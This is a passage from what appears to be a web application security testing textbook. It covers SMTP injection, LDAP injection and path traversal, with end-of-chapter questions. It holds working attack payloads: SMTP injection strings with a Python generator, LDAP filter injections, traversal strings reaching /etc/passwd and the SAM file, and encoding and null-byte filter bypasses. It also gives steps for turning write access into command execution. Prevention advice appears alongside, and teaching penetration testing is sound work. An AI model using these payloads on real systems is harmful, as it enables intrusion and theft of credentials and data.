%0d%0aDATA%0d%0afoo%0d%0a%2e%0d%0aMAIL+FROM:+<youremail>%0d%0aRCPT+TO:+<youremail>%0d%0aDATA%0d%0aFrom:+<youremail>%0d%0aTo:+<youremail>%0d%0aSubject:+test%0d%0afoo%0d%0a%2e%0d%0a

■ Note any error messages returned by the application. If these appear to

relate to any problem in the email function, investigate whether you

need to fine-tune your input to exploit a vulnerability.

■ The application’s responses may not indicate in any way whether a

vulnerability exists or was successfully exploited. You should monitor the

email address you specified to see if any mails are received.

■ Review closely the HTML form that generates the relevant request. This

may contain clues regarding the server-side software being used. It may

also contain a hidden or disabled field that is used to specify the To address

of the email, which you can modify directly.
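
If you are testing many parameters, it can be convenient to generate both newline variants of the test string from one template. The following Python sketch does this; the helper names smtp_probe and smtp_probes are hypothetical, and the email address is inserted as given, without any further URL encoding.

```python
from typing import List


def smtp_probe(email: str, newline: str) -> str:
    """Build one URL-encoded probe string using the given encoded newline."""
    lines = [
        "DATA", "foo", "%2e",
        f"MAIL+FROM:+{email}", f"RCPT+TO:+{email}",
        "DATA", f"From:+{email}", f"To:+{email}",
        "Subject:+test", "foo", "%2e",
    ]
    # The leading newline ends the field being injected into; the trailing
    # newline completes the final line containing a lone dot.
    return newline + newline.join(lines) + newline


def smtp_probes(email: str) -> List[str]:
    """Return the Unix-style (LF) and Windows-style (CRLF) variants."""
    return [smtp_probe(email, nl) for nl in ("%0a", "%0d%0a")]
```

Calling smtp_probes() with your own address yields the two strings to submit as each parameter in turn.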

TIP Functions to send emails to application support personnel are frequently

regarded as peripheral and may not be subject to the same security standards

or testing as the main application functionality. Also, because they involve

interfacing to an unusual back-end component, they are often implemented via

a direct call to the relevant operating system command. Hence, in addition to

probing for SMTP injection, you should also review all email-related

functionality very closely for OS command injection flaws.


Preventing SMTP Injection

SMTP injection vulnerabilities can usually be prevented by implementing

rigorous validation of any user-supplied data that is passed to an email function

or used in an SMTP conversation. Each item should be validated as strictly as

possible given the purpose for which it is being used:

■ Email addresses should be checked against a suitable regular

expression (which should of course reject any newline characters).

■ The message subject should not contain any newline characters, and

may be subjected to a suitable length limit.

■ If the contents of a message are being used directly in an SMTP

conversation, then lines containing just a single dot should be disallowed.
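
The three checks above might be sketched in Python as follows. The address pattern is a deliberately conservative assumption rather than a complete implementation of the email address grammar, the length limit is arbitrary, and all names are hypothetical.

```python
import re

# Conservative address pattern (an assumption, not a full address parser).
# The character classes exclude whitespace, so CR and LF can never match.
_EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+")
MAX_SUBJECT_LEN = 100  # arbitrary illustrative limit


def valid_email(addr: str) -> bool:
    """Accept only addresses that match the whole pattern."""
    return _EMAIL_RE.fullmatch(addr) is not None


def valid_subject(subject: str) -> bool:
    """Reject subjects containing CR or LF, or exceeding the length limit."""
    return ("\r" not in subject and "\n" not in subject
            and len(subject) <= MAX_SUBJECT_LEN)


def valid_body(body: str) -> bool:
    """Reject any body containing a line that consists of just a single dot."""
    return all(line != "." for line in body.splitlines())
```

Using fullmatch() rather than a pattern anchored with $ avoids accepting an address that is followed by a trailing newline.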

Injecting into LDAP

The Lightweight Directory Access Protocol (LDAP) is used for accessing

directory services over a network. A directory is a hierarchically organized data

store that may contain any kind of information but is commonly used to store

personal data such as names, telephone numbers, email addresses, and job

functions. An example of such a directory is the Active Directory used within

Windows domains. You are most likely to encounter LDAP being used in

corporate intranet-based web applications, such as an HR application that allows

users to view and modify information about employees.

Consider a simple application function that enables users to search

for employee contact details by specifying an employee name, as shown in

Figure 9-9.

Figure 9-9: An LDAP-based directory search function


When a user supplies the search term GUILL, the application performs the

following LDAP query:

<LDAP://ldapserver>;(givenName=GUILL);cn,telephoneNumber,department

This query contains two key elements:

■ The search filter: givenName=GUILL

■ The attributes to be returned: cn,telephoneNumber,department

In this situation, it is possible for an attacker to supply a crafted search term

that interferes with one or both of these elements, to modify the information

returned by the query.

Injecting Query Attributes

To retrieve other attributes in the query’s results, you must first terminate the

brackets that encapsulate the search filter and then specify the additional

attributes that you desire. For example, supplying

GUILL);mail,cn;

results in the query

<LDAP://ldapserver>;(givenName=GUILL);mail,cn;);cn,telephoneNumber,department

which returns an additional column containing the user’s email address, as

shown in Figure 9-10.

Figure 9-10: Injecting an additional query attribute


Note the additional column containing the bogus attribute name cn;);cn.

The LDAP query attributes are specified in a comma-delimited list, so

everything between the first and second comma is treated as an attribute name.

Note also that Active Directory will return an error if a completely arbitrary

attribute name is specified; however, it tolerates invalid names that start with

a valid name followed by a semicolon, hence the need to specify cn;

after the injected string.

Going further, you can specify any number of fields to be returned in the

results, and you can also specify an asterisk as the main search filter, which

functions as a wildcard. For example, supplying

*);cn,l,co,st,c,mail,cn;

will return all of these fields for every user, as shown in Figure 9-11.

Figure 9-11: An attack to retrieve all information in the directory

Modifying the Search Filter

In some situations, the user-supplied input is not used directly as the entire

value of the search filter but is embedded in a more complex filter. For

example, if the user performing the search is only allowed to view the details of

employees based in France, the application might perform the following

query:

<LDAP://ldapserver>;(&(givenName=GUILL)(c=FR));cn,telephoneNumber,department,c


This uses the & operator to combine two conditions: the first controlled by

the user and the second preset by the application. Supplying the search term *

will return the details of all users based in France. However, supplying the

string

*));cn,cn;

causes the application to make the following query:

<LDAP://ldapserver>;(&(givenName=*));cn,cn;)(c=FR));cn,telephoneNumber,department,c

which subverts the application’s original logic, removing the (c=FR) condition

from the search filter, thus returning the results of all users in all countries, as

shown in Figure 9-12.

Figure 9-12: A successful attack to subvert the intended search filter
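
The queries shown in this section all result from simple string concatenation. The Python sketch below models the two search functions in this way; the function names are hypothetical, and the real application may build its queries differently, but the resulting strings match those shown above.

```python
def simple_query(term: str) -> str:
    """Model of the first search: input used as the whole filter value."""
    return f"<LDAP://ldapserver>;(givenName={term});cn,telephoneNumber,department"


def restricted_query(term: str) -> str:
    """Model of the France-only search: input embedded in an & filter."""
    return (f"<LDAP://ldapserver>;(&(givenName={term})(c=FR));"
            "cn,telephoneNumber,department,c")


for build, term in [(simple_query, "GUILL"),
                    (simple_query, "GUILL);mail,cn;"),
                    (restricted_query, "*));cn,cn;")]:
    print(build(term))
```

In the last case, the injected closing brackets and semicolon end the filter early, so the preset (c=FR) condition falls into the attribute list instead of the search filter.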

Finding LDAP Injection Flaws

Supplying invalid input to an LDAP operation typically does not result in any

informative error message. In general, the evidence available to you in

diagnosing a vulnerability includes the results returned by a search function, and

the occurrence of an error such as an HTTP 500 status code. Nevertheless, you

can use the following steps to identify an LDAP injection flaw with a degree of

reliability.


HACK STEPS

■ Try entering just the * character as a search term. This character functions

as a wildcard in LDAP, but not in SQL. If a large number of results are

returned, this is a good indicator that you are dealing with an LDAP

query.

■ Try entering a number of closing brackets:

))))))))))

This input will close any brackets enclosing your input, and those that

encapsulate the main search filter itself, resulting in unmatched closing

brackets, thus invalidating the query syntax. If an error results, the

application may well be vulnerable to LDAP injection. (Note that this input

may also break many other kinds of application logic, so this only provides

a strong indicator if you are already confident that you are dealing with an

LDAP query.)

■ Try entering a series of expressions like the following, until no error

occurs, thus establishing the number of brackets you need to close to

control the rest of the query:

*);cn;

*));cn;

*)));cn;

*))));cn;

■ Try adding extra attributes to the end of your input, using commas to

separate each item. Test each attribute in turn; an error message

indicates that the attribute is not valid in the present context. Attributes

commonly used in directories queried by LDAP include:

cn,c,mail,givenname,o,ou,dc,l,uid,objectclass,postaladdress,dn,sn

Preventing LDAP Injection

If it is necessary to insert user-supplied input into an LDAP query, this

operation should only be performed on simple items of data that can be subjected to

strict input validation. The user input should be checked against a white list of

acceptable characters, which should ideally include only alphanumeric

characters. Characters that may be used to interfere with the LDAP query should

be blocked, including ( ) ; , * | & and =. Any input that does not match the

white list should be rejected, not sanitized.
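
Applied to the directory search example, this approach might look like the following Python sketch. The function name build_search_filter is hypothetical, and the alphanumeric-only rule is an assumption that would need relaxing for names containing spaces, hyphens, or accented letters.

```python
import re

# White list for the search term: ASCII letters and digits only.
_SAFE_TERM = re.compile(r"[A-Za-z0-9]+")


def build_search_filter(term: str) -> str:
    """Build the givenName filter only from input that passes the white list."""
    if not _SAFE_TERM.fullmatch(term):
        # Rejecting, not sanitizing: the query is never built from bad input.
        raise ValueError("search term rejected")
    return f"(givenName={term})"
```

Note that this also rejects a bare * search term, so users can no longer use the wildcard to list the whole directory.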


Chapter Summary

We have examined a wide range of code injection vulnerabilities, and the

practical steps that you can take to identify and exploit each one. There are many

real-world injection flaws that can be discovered within the first few seconds

of interacting with an application (for example, by entering an apostrophe

into a search box). In other cases, code injection vulnerabilities may be highly

subtle, manifesting themselves in scarcely detectable differences in the

application’s behavior, or reachable only through a multistage process of

submitting and manipulating crafted input.

To be confident that you have uncovered the code injection flaws that exist

within an application, you need to be both thorough and patient. Practically

every type of injection can manifest itself in the processing of practically any

item of user-supplied data, including the names and values of query string

parameters, POST data and cookies, and other HTTP headers. In many cases, a

defect will emerge only after extensive probing of the relevant parameter, as

you learn exactly what type of processing is being performed on your input

and scrutinize the obstacles that stand in your way.

Faced with the huge potential attack surface presented by code injection

vulnerabilities, you may feel that any serious assault on an application must entail a

titanic effort. However, part of learning the art of attacking software is to acquire

a sixth sense for where the treasure is hidden and how your target is likely to

open up so that you can steal it. The only way to gain this sense is through

practice, rehearsing the techniques we have described against the real-life

applications you encounter, and seeing how they stand up to them.

Questions

Answers can be found at www.wiley.com/go/webhacker.

1. You are trying to exploit a SQL injection flaw by performing a UNION

attack to retrieve data. You do not know how many columns the original

query returns. How can you find this out?

2. You have located a SQL injection vulnerability in a string parameter.

You believe the database is either MS-SQL or Oracle but are unable at

this stage to retrieve any data or an error message to confirm which

database is running. How can you find this out?

3. You have submitted a single quotation mark at numerous locations

throughout the application, and from the resulting error messages have

diagnosed several potential SQL injection flaws. Which one of the

following would be the safest location to test whether more crafted input

has an effect on the application’s processing?

(a) Registering a new user

(b) Updating your personal details

4. You have found a SQL injection vulnerability in a login function, and

you try to use the input ' or 1=1-- to bypass the login. Your attack

fails and the resulting error message indicates that the -- characters are

being stripped by the application’s input filters. How could you

circumvent this problem?

5. You have found a SQL injection vulnerability but have been unable to

carry out any useful attacks because the application rejects any input

containing whitespace. How can you work around this restriction?

6. The application is doubling up all single quotation marks within user

input before these are incorporated into SQL queries. You have found a

SQL injection vulnerability in a numeric field, but you need to use a

string value in one of your attack payloads. How can you place a string

into your query without using any quotation marks?

7. In some rare situations, applications construct dynamic SQL queries out

of user-supplied input in a way that cannot be made safe using

parameterized queries. When does this occur?

8. You have escalated privileges within an application such that you now

have full administrative access. You discover a SQL injection

vulnerability within a user administration function. How can you leverage this

vulnerability to further advance your attack?

9. You are attacking an application that holds no sensitive data, and

contains no authentication or access control mechanisms. In this situation,

how should you rank the significance of the following vulnerabilities?

(a) SQL injection

(b) XPath injection

10. You are probing an application function that enables you to search

personnel details. You suspect that the function is accessing either a

database or an Active Directory back end. How could you try to determine

which of these is the case?


CHAPTER 10

Exploiting Path Traversal

Many kinds of functionality oblige a web application to read from or write to

a file system on the basis of parameters supplied within user requests. If these

operations are carried out in an unsafe manner, an attacker can submit crafted

input which causes the application to access files that the application designer

did not intend it to access. Known as path traversal vulnerabilities, such defects

may enable the attacker to read sensitive data including passwords and

application logs, or to overwrite security-critical items such as configuration files

and software binaries. In the most serious cases, the vulnerability may enable

an attacker to completely compromise both the application and the underlying

operating system.

Path traversal flaws are sometimes subtle to detect, and many web

applications implement defenses against them that may be vulnerable to bypasses.

We will describe all of the various techniques you will need, from identifying

potential targets, to probing for vulnerable behavior, to circumventing the

application’s defenses.

Common Vulnerabilities

Path traversal vulnerabilities arise when user-controllable data is used by the

application to access files and directories on the application server or other

back-end file system in an unsafe way. By submitting crafted input, an attacker

may be able to cause arbitrary content to be read from, or written to, anywhere

on the file system being accessed. This often enables an attacker to read

sensitive information from the server, or overwrite sensitive files, leading

ultimately to arbitrary command execution on the server.

Consider the following example, in which an application uses a dynamic

page to return static images to the client. The name of the requested image is

specified in a query string parameter:

https://wahh-app.com/scripts/GetImage.aspx?file=diagram1.jpg

When the server processes this request, it performs the following steps:

1. Extracts the value of the file parameter from the query string.

2. Appends this value to the prefix C:\wahh-app\images\.

3. Opens the file with this name.

4. Reads the file’s contents and returns it to the client.

The vulnerability arises because an attacker can place path traversal

sequences into the filename in order to backtrack up from the image directory

specified in step 2 and so access files from anywhere on the server. The path

traversal sequence is known as “dot-dot-slash,” and a typical attack would

look like this:

https://wahh-app.com/scripts/GetImage.aspx?file=..\..\winnt\repair\sam

When the application appends the value of the file parameter to the name

of the images directory, it obtains the following path:

C:\wahh-app\images\..\..\winnt\repair\sam

The two traversal sequences effectively step back up from the images

directory to the root of the C: drive, and so the preceding path is equivalent to this:

C:\winnt\repair\sam

Hence, instead of returning an image file, the server actually returns the

repair copy of the Windows SAM file. This file may be analyzed by the

attacker to obtain usernames and passwords for the server operating system.
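
The way the traversal sequences collapse can be checked with Python's ntpath module, which applies Windows path rules on any platform. This is only a model of the lexical normalization involved, not the application's actual code; the function name resolve_naive is hypothetical.

```python
import ntpath  # Windows path semantics, usable on any platform

IMAGE_DIR = "C:\\wahh-app\\images\\"


def resolve_naive(file_param: str) -> str:
    """Append the parameter to the prefix, as in step 2, then normalize."""
    return ntpath.normpath(IMAGE_DIR + file_param)


print(resolve_naive("diagram1.jpg"))
print(resolve_naive("..\\..\\winnt\\repair\\sam"))
```

The first call stays inside the images directory, while the second resolves to a path directly under the root of the C: drive.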

In this simple example, the application implements no defenses to prevent

path traversal attacks. However, because these attacks have been widely

known about for some time, it is common to encounter applications that

implement various defenses against them, often based on input validation

filters. As you will see, these filters are often poorly designed and can be

bypassed by a skilled attacker.


Finding and Exploiting Path

Traversal Vulnerabilities

Path traversal vulnerabilities are often subtle and hard to detect, and it may be

necessary to prioritize your efforts on locations within the application that are

most likely to manifest the vulnerability.

Locating Targets for Attack

During your initial mapping of the application, you should already have

identified any obvious areas of attack surface in relation to path traversal

vulnerabilities. Any functionality whose explicit purpose is uploading or downloading

files should be thoroughly tested. This functionality is often found in workflow

applications where users can share documents, in blogging and auction

applications where users can upload images, and in informational applications

where users can retrieve documents such as ebooks, technical manuals, and

company reports.

In addition to obvious target functionality of this kind, there are various

other types of behavior that may suggest relevant interaction with the file

system.

HACK STEPS

■ Review the information gathered during application mapping to identify:

  ■ Any instance where a request parameter appears to contain the

  name of a file or directory (for example, include=main.inc or

  template=/en/sidebar).

  ■ Any application functions whose implementation is likely to involve

  retrieval of data from a server file system (as opposed to a back-end

  database), for example, the displaying of office documents or

  images.

■ During all testing which you perform in relation to every other kind of

vulnerability, look for error messages or other anomalous events that are

of interest. Try to find any evidence of instances where user-supplied

data is being passed to file APIs or as parameters to operating system

commands.

NOTE If you have local access to the application (either in a white-box testing

exercise or because you have compromised the server’s operating system),

identifying targets for path traversal testing is usually straightforward, because

you can monitor all file system interaction performed by the application.


HACK STEPS

If you have local access to the web application:

■ Use a suitable tool to monitor all file system activity on the server. For

example, the FileMon tool from SysInternals can be used on the

Windows platform, the ltrace/strace tools can be used on Linux, and the

truss command can be used on Sun’s Solaris.

■ Test every page of the application by inserting a single unique string (such

as traversaltest) into each submitted parameter (including all cookies,

query string fields, and POST data items). Target only one parameter at a

time, and use the automated techniques described in Chapter 13 to speed

up the process.

■ Set a filter in your file system monitoring tool to identify all file system

events that contain your test string.

■ If any events are identified where your test string has been used as or

incorporated into a file or directory name, test each instance (as described

next) to determine whether it is vulnerable to path traversal attacks.

Detecting Path Traversal Vulnerabilities

Having identified the various potential targets for path traversal testing,

you need to test every instance individually to determine whether user-

controllable data is being passed to relevant file system operations in an

unsafe manner.

For each user-supplied parameter being tested, determine whether traversal

sequences are being blocked by the application or whether they work as

expected. An initial test that is usually reliable is to submit traversal sequences

in a way that does not involve stepping back above the starting directory.

HACK STEPS

■ Working on the assumption that the parameter you are targeting is being

appended to a preset directory specified by the application, modify the

parameter’s value to insert an arbitrary subdirectory and a single

traversal sequence. For example, if the application submits the parameter

file=foo/file1.txt

then try submitting the value

file=foo/bar/../file1.txt


■ If the application’s behavior is identical in the two cases, then it may be

vulnerable. You should proceed directly to attempting to access a

different file by traversing above the start directory.

■ If the application’s behavior is different in the two cases, then it may be

blocking, stripping, or sanitizing traversal sequences, resulting in an

invalid file path. You should examine whether there are any ways of

circumventing the application’s validation filters (described in the next

section, “Circumventing Obstacles to Traversal Attacks”).

■ The reason why this test is effective, even if the subdirectory “bar” does

not exist, is that most common file systems perform canonicalization of

the file path before attempting to retrieve it. The traversal sequence

cancels out the invented directory, and so the server does not check whether

it is present.
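
The cancellation described in the last step can be illustrated with Python's posixpath module, which performs purely lexical normalization without touching the file system. Treat this as an approximation: how a given platform or file API actually resolves such a path may differ, which is exactly what the test is designed to reveal. The helper name insert_probe is hypothetical.

```python
import posixpath


def insert_probe(value: str, subdir: str = "bar") -> str:
    """Insert an invented subdirectory and one traversal sequence before the filename."""
    head, tail = posixpath.split(value)
    return posixpath.join(head, subdir, "..", tail)


probe = insert_probe("foo/file1.txt")
print(probe)                      # the modified parameter value to submit
print(posixpath.normpath(probe))  # what it collapses to after normalization
```

Because the probe normalizes back to the original value, identical application behavior for both requests suggests that traversal sequences are reaching the file system unmodified.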

If you find any instances where submitting traversal sequences without

stepping above the starting directory does not affect the application’s

behavior, the next test is to attempt to traverse out of the starting directory and access

files from elsewhere on the server file system.

HACK STEPS

■ If the application function you are attacking provides read access to a

file, attempt to access a known world-readable file on the operating

system in question. Submit one of the following values as the filename

parameter you control:

../../../../../../../../../../../../etc/passwd

../../../../../../../../../../../../boot.ini

If you are lucky, your browser will display the contents of the file you have

requested, as in Figure 10-1.

■ If the function you are attacking provides write access to a file, it may be

more difficult to verify conclusively whether the application is vulnerable.

One test that is often effective is to attempt to write two files, one that

ought to be writable by any user, and one which should not be writable

even by root or Administrator. For example, on Windows platforms you

can try:

../../../../../../../../../../../../writetest.txt

../../../../../../../../../../../../windows/system32/config/sam

On Unix-based platforms, files that root may not write are version-

dependent, but attempting to overwrite a directory with a file should

always fail, so you can try:

../../../../../../../../../../../../tmp/writetest.txt

../../../../../../../../../../../../tmp

For each pair of tests, if the application’s behavior is different in response

to the first and second requests (for example, if the second returns an error

message, while the first does not), then it is likely that the application is

vulnerable.

■ An alternative method for verifying a traversal flaw with write access is

to try to write a new file within the web root of the web server and then

attempt to retrieve this with a browser. However, this method may not

work if you do not know the location of the web root directory or the

user context in which the file access occurs does not have permission to

write there.

Figure 10-1: A successful path traversal attack

NOTE Virtually all file systems tolerate redundant traversal sequences which

appear to try to step up above the root of the file system. Hence, it is usually

advisable to submit a large number of traversal sequences when probing for a

flaw, as in the examples given here. It is possible that the starting directory to

which your data is appended lies deep within the file system, and so using an

excessive number of sequences helps to avoid false negatives.

Also, the Windows platform tolerates both forward slashes and backslashes as

directory separators, whereas Unix-based platforms tolerate only the forward

slash. Further, some web applications filter one version but not the other. Even

if you are completely certain that the web server is running a Unix-based

operating system, the application may still be calling out to a Windows-based

back-end component. Because of this, it is always advisable to try both

versions when probing for traversal flaws.
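As a rough sketch of the advice in this note, the following Python builds deep traversal payloads with both separator styles. The function name, the default depth of 12, and the example start directory are assumptions chosen for illustration.

```python
import posixpath


def traversal_payloads(target, depth=12):
    """Return payloads for `target` using forward slashes and backslashes."""
    segments = [part for part in target.split("/") if part]
    payloads = []
    for sep in ("/", "\\"):
        payloads.append((".." + sep) * depth + sep.join(segments))
    return payloads


for payload in traversal_payloads("etc/passwd"):
    print(payload)

# Redundant sequences are harmless: stepping "above" the root stays at the root.
start_dir = "/var/www/app/files/"  # hypothetical start directory
print(posixpath.normpath(start_dir + traversal_payloads("etc/passwd")[0]))
```

The final line shows why an excessive depth costs nothing: the extra sequences are discarded once the root is reached.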

Circumventing Obstacles to Traversal Attacks

If your initial attempts to perform a traversal attack, as described previously,

are unsuccessful, this does not mean that the application is not vulnerable.

Many application developers are aware of path traversal vulnerabilities and

implement various kinds of input validation checks in an attempt to prevent

them. However, those defenses are often flawed and can be bypassed by a

skilled attacker.

The first type of input filter commonly encountered involves checking

whether the filename parameter contains any path traversal sequences, and if

so, either rejecting the request or attempting to sanitize the input to remove the

sequences. This type of filter is often vulnerable to various attacks that use

alternative encodings and other tricks to defeat the filter. These attacks all

exploit the type of canonicalization problems faced by input validation mech-

anisms, as described in Chapter 2.

HACK STEPS

■ Always try path traversal sequences using both forward slashes and

backslashes. Many input filters check for only one of these, when the file

system may support both.

■ Try simple URL-encoded representations of traversal sequences, using

the following encodings. Be sure to encode every single slash and dot

within your input:

dot %2e

forward slash %2f

backslash %5c

■ Try using 16-bit Unicode–encoding:

dot %u002e

forward slash %u2215

backslash %u2216

■ Try double URL–encoding:

dot %252e

forward slash %252f

backslash %255c

■ Try overlong UTF-8 Unicode–encoding:

dot %c0%2e %e0%40%ae %c0ae etc.

forward slash %c0%af %e0%80%af %c0%2f etc.

backslash %c0%5c %c0%80%5c etc.

You can use the illegal Unicode payload type within Burp Intruder to

generate a huge number of alternate representations of any given character,

and submit this at the relevant place within your target parameter. These

are representations that strictly violate the rules for Unicode representation

but are nevertheless accepted by many implementations of Unicode

decoders, particularly on the Windows platform.

■ If the application is attempting to sanitize user input by removing traver-

sal sequences, and does not apply this filter recursively, then it may be

possible to bypass the filter by placing one sequence within another. For

example:

....//

....\/

..../\

....\\
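Two of the techniques above lend themselves to a short demonstration: single and double URL-encoding, and nesting one sequence inside another to defeat a filter that strips only once. The sketch below is illustrative only; the helper names are assumptions, and `strip_once` stands in for a hypothetical non-recursive sanitizer. The 16-bit and overlong encodings are not covered here.

```python
from urllib.parse import unquote

SINGLE = {".": "%2e", "/": "%2f", "\\": "%5c"}
DOUBLE = {".": "%252e", "/": "%252f", "\\": "%255c"}


def encode_all(text, table):
    """Encode every dot and slash in `text` using the given table."""
    return "".join(table.get(ch, ch) for ch in text)


def strip_once(value, sequence="../"):
    """Hypothetical sanitizer: removes the sequence in a single pass."""
    return value.replace(sequence, "")


print(encode_all("../", SINGLE))
print(encode_all("../", DOUBLE))

# A double-encoded value survives one round of decoding still encoded.
once = unquote(encode_all("../", DOUBLE))
print(once, unquote(once))

# Nested sequences collapse back into a traversal sequence after stripping.
print(strip_once("....//"))
print(strip_once("....\\/", sequence="..\\"))
```

If the filter decodes once and then checks, the double-encoded form passes the check and is decoded again later; if it strips once, the nested form reassembles itself.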

The second type of input filter commonly encountered in defenses against

path traversal attacks involves verifying whether the user-supplied filename

contains a suffix (i.e., file type) or prefix (i.e., starting directory) that the appli-

cation is expecting. This type of defense may be used in tandem with the filters

described already.

HACK STEPS

■ Some applications check whether the user-supplied filename ends in a

particular file type or set of file types, and reject attempts to access any-

thing else. Sometimes this check can be subverted by placing a URL-

encoded null byte at the end of your requested filename, followed by a

file type that the application accepts. For example:

../../../../../boot.ini%00.jpg

The reason this attack sometimes succeeds is that the file type check

is implemented using an API in a managed execution environment

in which strings are permitted to contain null characters (such as

String.endsWith() in Java). However, when the file is actually retrieved,

the application ultimately uses an API in an unmanaged environment in

which strings are null-terminated and so your filename is effectively

truncated to your desired value.

■ A different attack against file type filtering is to use a URL-encoded new-

line character. Some methods of file retrieval (usually on Unix-based

platforms) may effectively truncate your filename when a newline is

encountered:

../../../../../etc/passwd%0a.jpg

■ Some applications attempt to control the file type being accessed by

appending their own file type suffix to the filename supplied by the user.

In this situation, either of the preceding exploits may be effective, for the

same reasons.

■ Some applications check whether the user-supplied filename starts with

a particular subdirectory of the start directory, or even a specific file-

name. This check can of course be trivially bypassed as follows:

wahh-app/images/../../../../../../../etc/passwd

■ If none of the preceding attacks against input filters are successful indi-

vidually, it may be that the application is implementing multiple types of

filters, and so you need to combine several of these attacks simultane-

ously (both against traversal sequence filters and file type or directory fil-

ters). If possible, the best approach here is to try to break the problem

down into separate stages. For example, if the request for

diagram1.jpg

is successful, but the request for

foo/../diagram1.jpg

fails, then try all of the possible traversal sequence bypasses until a

variation on the second request is successful. If these successful traversal

sequence bypasses don’t enable you to access /etc/passwd, probe

whether any file type filtering is implemented and can be bypassed, by

requesting

diagram1.jpg%00.jpg

Working entirely within the start directory defined by the application, try to

probe to understand all of the filters being implemented, and see whether

each can be bypassed individually with the techniques described.

■ Of course, if you have white box access to the application, then your task

is much easier, because you can systematically work through different

types of input and verify conclusively what filename (if any) is actually

reaching the file system.
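The weaknesses of suffix and prefix checks can be modeled in Python. This is a simplified sketch under stated assumptions: the check functions, the start directory /var/www, and the `as_c_string` helper (which imitates how a null-terminated API would read the string) are all hypothetical.

```python
import posixpath
from urllib.parse import unquote

START_DIR = "/var/www"  # hypothetical start directory
REQUIRED_PREFIX = "wahh-app/images/"
ALLOWED_SUFFIX = ".jpg"


def passes_prefix_check(filename):
    return filename.startswith(REQUIRED_PREFIX)


def passes_suffix_check(filename):
    return filename.endswith(ALLOWED_SUFFIX)


def as_c_string(filename):
    """Model a null-terminated API: everything after the first NUL is lost."""
    return filename.split("\x00", 1)[0]


prefixed = "wahh-app/images/../../../../../../../etc/passwd"
print(passes_prefix_check(prefixed))
print(posixpath.normpath(posixpath.join(START_DIR, prefixed)))

decoded = unquote("../../../../../boot.ini%00.jpg")
print(passes_suffix_check(decoded))
print(repr(as_c_string(decoded)))
```

In both cases the check inspects one string while the file system ends up acting on another.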

Coping with Custom Encoding

Probably the craziest path traversal bug that the authors have encountered

involved a custom encoding scheme for filenames that were ultimately han-

dled in an unsafe way, and demonstrated how obfuscation provides no substi-

tute for security.

The application contained some workflow functionality that enabled users

to upload and download files. The request performing the upload supplied a

filename parameter that was vulnerable to a path traversal attack when writ-

ing the file. When a file had been successfully uploaded, the application pro-

vided users with a URL to download it again. There were two important

caveats:

■ The application verified whether the file to be written already existed, and if so, refused to overwrite it.

■ The URLs generated for downloading users’ files were represented using a bespoke obfuscation scheme. This appeared to be a customized form of Base64-encoding, in which a different character set was employed at each position of the encoded filename.

Taken together, these caveats presented a barrier to straightforward

exploitation of the vulnerability. First, although it was possible to write arbi-

trary files to the server file system, it was not possible to overwrite any exist-

ing file, and the low privileges of the web server process meant that it was not

possible to create a new file in any interesting locations. Second, it was not pos-

sible to request an arbitrary existing file (such as

/etc/passwd) without reverse

engineering the custom encoding, which presented a lengthy and unappealing

challenge.

A little experimentation revealed that the obfuscated URLs contained the

original filename string supplied by the user. For example:

■ test.txt became zM1YTU4NTY2Y.

■ foo/../test.txt became E1NzUyMzE0ZjQ0NjMzND.

The difference in length of the encoded URLs indicated that no path canon-

icalization had been performed before applying the encoding. This behavior

gave us enough of a toe-hold to exploit the vulnerability. The first step was to

submit a file with the following name:

../../../../../.././etc/passwd/../../tmp/foo

which in its canonical form is equivalent to

/tmp/foo

and so could be written by the web server. Uploading this file produced a

download URL containing the following obfuscated filename:

FhwUk1rNXFUVEJOZW1kNlRsUk5NazE2V1RKTmFrMHdUbXBWZWs1NldYaE5lb

To modify this value to return the file /etc/passwd, we simply needed to

truncate it at the right point, which is

FhwUk1rNXFUVEJOZW1kNlRsUk5NazE2V1RKTmFrM

Attempting to download a file using this value returned the server’s passwd

file as expected. The server had given us sufficient resources to be able to

encode arbitrary file paths using its scheme, without even deciphering the

obfuscation algorithm being used!

NOTE The observant may have noticed the appearance of a redundant ./ in

the name of our uploaded file. This was necessary to ensure that our truncated

URL ended on a 3-byte boundary of clear text, and therefore on a 4-byte

boundary of encoded text, in line with the Base64-encoding scheme. Truncating

an encoded URL partway through an encoded block would almost certainly

cause an error when decoded on the server.
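The block arithmetic in this note can be checked with a small Python sketch. Standard Base64 is used here purely as a stand-in for the application's custom scheme, which the authors never deciphered, so the encoded output will not match the values shown above; only the 3-byte to 4-character alignment carries over.

```python
import base64

UPLOAD_NAME = "../../../../../.././etc/passwd/../../tmp/foo"
TARGET = "../../../../../.././etc/passwd"


def truncated_token(upload_name, target):
    """Encode upload_name and keep only the characters that cover target."""
    if not upload_name.startswith(target):
        raise ValueError("target must be a prefix of the uploaded name")
    if len(target) % 3 != 0:
        raise ValueError("target must end on a 3-byte boundary")
    encoded = base64.b64encode(upload_name.encode("ascii")).decode("ascii")
    return encoded[: len(target) // 3 * 4]


token = truncated_token(UPLOAD_NAME, TARGET)
print(len(TARGET), len(token))
print(base64.b64decode(token).decode("ascii"))
```

The target prefix is 30 bytes long, so it maps to exactly 40 encoded characters, the same length as the truncated value quoted above. Without the redundant ./ the prefix would be 28 bytes and the cut would fall inside an encoded block.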

Exploiting Traversal Vulnerabilities

Having identified a path traversal vulnerability that provides read or write

access to arbitrary files on the server’s file system, what kind of attacks can

you carry out by exploiting these? In most cases, you will find that you have

the same level of read/write access to the file system as the web server process

does.

HACK STEPS

■ You can exploit read-access path traversal flaws to retrieve interesting

files from the server that may contain directly useful information or help

you to refine attacks against other vulnerabilities. For example:

   ■ Password files for the operating system and application.

   ■ Server and application configuration files, to discover other vulnerabilities or fine-tune a different attack.

   ■ Include files that may contain database credentials.

   ■ Data sources used by the application, such as MySQL database files or XML files.

   ■ The source code to server-executable pages, to perform a code review in search of bugs (for example, GetImage.aspx?file=GetImage.aspx).

   ■ Application log files that may contain usernames and session tokens, and the like.

■ If you find a path traversal vulnerability that grants write access, your

main goal should be to exploit this to achieve arbitrary execution of com-

mands on the server. Means of exploiting the vulnerability to achieve this

include:

   ■ Creating scripts in users’ startup folders.

   ■ Modifying files such as in.ftpd to execute arbitrary commands when a user next connects.

   ■ Writing scripts to a web directory with execute permissions and calling them from your browser.

Preventing Path Traversal Vulnerabilities

By far the most effective means of eliminating path traversal vulnerabilities is

to avoid passing user-submitted data to any file system API. In many cases,

including the original example

GetImage.aspx?file=diagram1.jpg, it is

entirely unnecessary for an application to do this. For most files that are not

subject to any access control, the files can simply be placed within the web root

and accessed via a direct URL. If this is not possible, the application can main-

